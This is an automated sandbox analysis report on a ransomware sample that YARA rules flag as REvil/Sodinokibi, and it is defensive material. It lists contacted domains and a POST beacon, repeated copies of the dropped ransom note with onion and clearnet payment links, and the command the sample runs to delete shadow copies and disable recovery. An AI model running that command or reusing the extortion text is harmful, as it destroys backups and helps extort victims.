Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://brownswoodblog.com/
Source: RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://decryptor.top/
Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr, 985drm9-readme.txt30.0.dr, 985drm9-readme.txt47.0.dr, 985drm9-readme.txt31.0.dr	String found in binary or memory: http://decryptor.top/45C1E9BA4D645606
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avtoboss163.ru/
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avtoboss163.ru:443/static/assets/hbhezx.pngources
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brownswoodblog.com/
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brownswoodblog.com/admin/pics/hdxsmg.gifmsu
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://brownswoodblog.com:443/admin/pics/hdxsmg.gifData
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://p-ride.live:443/data/image/oe.gifv1.0
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://patriotcleaning.net/
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://patriotcleaning.net/W
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://patriotcleaning.net/admin/graphic/ervzot.jpg
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://patriotcleaning.net:443/admin/graphic/ervzot.jpgs
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rarefoods.ro/
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rarefoods.ro/admin/pics/wcyshd.png
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rarefoods.ro/admin/pics/wcyshd.png1
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.000000000075B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rarefoods.ro/r
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rarefoods.ro:443/admin/pics/wcyshd.pngebResources
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://so-sage.fr/
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://so-sage.fr/1
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://so-sage.fr/Y
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2925814967.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://so-sage.fr/news/game/bvprbb.png
Source: RQzHm5vLxs.exe, 00000000.00000002.2925814967.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://so-sage.fr:443/news/game/bvprbb.pngt
Source: RQzHm5vLxs.exe, 00000000.00000003.2146778356.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665541859.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2052588010.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2113111290.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922030335.0000000002520000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1922100187.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921990735.0000000002515000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2215006732.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2062978982.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000002.2926971200.0000000002507000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2146982196.0000000002509000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1665524743.0000000002510000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.1921931735.0000000002522000.00000004.00000020.00020000.00000000.sdmp, 985drm9-readme.txt17.0.dr, 985drm9-readme.txt13.0.dr, 985drm9-readme.txt28.0.dr, 985drm9-readme.txt10.0.dr, 985drm9-readme.txt51.0.dr, 985drm9-readme.txt39.0.dr, 985drm9-readme.txt42.0.dr, 985drm9-readme.txt61.0.dr	String found in binary or memory: https://torproject.org/

Source: unknown

HTTP traffic detected: POST /data/image/oe.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 870Host: p-ride.live

Source: unknown

DNS traffic detected: queries for: p-ride.live

Source: unknown	HTTPS traffic detected: 172.67.132.175:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.32.57.142:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.93:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.197.111.104:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 137.74.231.3:443 -> 192.168.2.4:49739 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Yara detected Conti ransomware

Source: Yara match

File source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR

Yara detected Sodinokibi Ransomware

Source: Yara match

File source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR

Yara detected TrojanRansom

Source: Yara match

File source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR

Found ransom note / readme

Source: C:\Users\user\Documents\QNCYCDFIJJ\985drm9-readme.txt

Dropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 985drm9.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D6456062) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/45C1E9BA4D645606Warning: secondary website can be blocked, thats why first variant much

Jump to dropped file

Yara detected Netwalker ransomware

Source: Yara match

File source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR

Yara detected Revil

Source: Yara match	File source: RQzHm5vLxs.exe, type: SAMPLE
Source: Yara match	File source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE

Yara detected RansomwareGeneric

Source: Yara match

File source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR

Yara detected Chaos Ransomware

Source: Yara match

File source: Process Memory Space: RQzHm5vLxs.exe PID: 6232, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File moved: C:\Users\user\Desktop\WKXEWIOTXI.png	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File deleted: C:\Users\user\Desktop\WKXEWIOTXI.png	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File moved: C:\Users\user\Desktop\NWTVCDUMOB.pdf	Jump to behavior

Contains functionalty to change the wallpaper

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

Code function: 0_2_00D938C7 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,

0_2_00D938C7

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\user\Documents\QNCYCDFIJJ\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\user\Documents\UMMBDNEQBN\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\user\Documents\UOOJJOZIRH\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\user\Documents\VLZDGUKUTZ\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Program Files (x86)\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Recovery\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\$WinREAgent\Scratch\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\Default\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File dropped: C:\Users\user\985drm9-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45c1e9ba4d6456062) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/45c1e9ba4d645606warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:fk/hcx3ful3ygteenrbfedhyjxn2ohscloomg/g1bhf16tanvlhojygqp	Jump to dropped file

Deletes shadow drive data (may be related to ransomware)

Source: RQzHm5vLxs.exe, 00000000.00000002.2926497345.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ]kY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectionsionsmCertificates\TrustedPeopletoreserC:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenable

System Summary

Malicious sample detected (through community Yara rule)

Source: RQzHm5vLxs.exe, type: SAMPLE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: RQzHm5vLxs.exe, type: SAMPLE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: RQzHm5vLxs.exe, type: SAMPLE	Matched rule: REvil Payload Author: R3MRUM
Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: REvil Payload Author: R3MRUM
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: REvil Payload Author: R3MRUM
Source: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
Source: 00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown

Source: RQzHm5vLxs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: RQzHm5vLxs.exe, type: SAMPLE	Matched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
Source: RQzHm5vLxs.exe, type: SAMPLE	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: RQzHm5vLxs.exe, type: SAMPLE	Matched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: 0.0.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack, type: UNPACKEDPE	Matched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
Source: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
Source: 00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe

File deleted: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifest

Jump to behavior

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D9A3CF	0_2_00D9A3CF
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D97202	0_2_00D97202
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D96FA4	0_2_00D96FA4
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D9973A	0_2_00D9973A
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D97725	0_2_00D97725

Source: RQzHm5vLxs.exe

Static PE information: No import functions for PE file found

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Section loaded: cscapi.dll	Jump to behavior
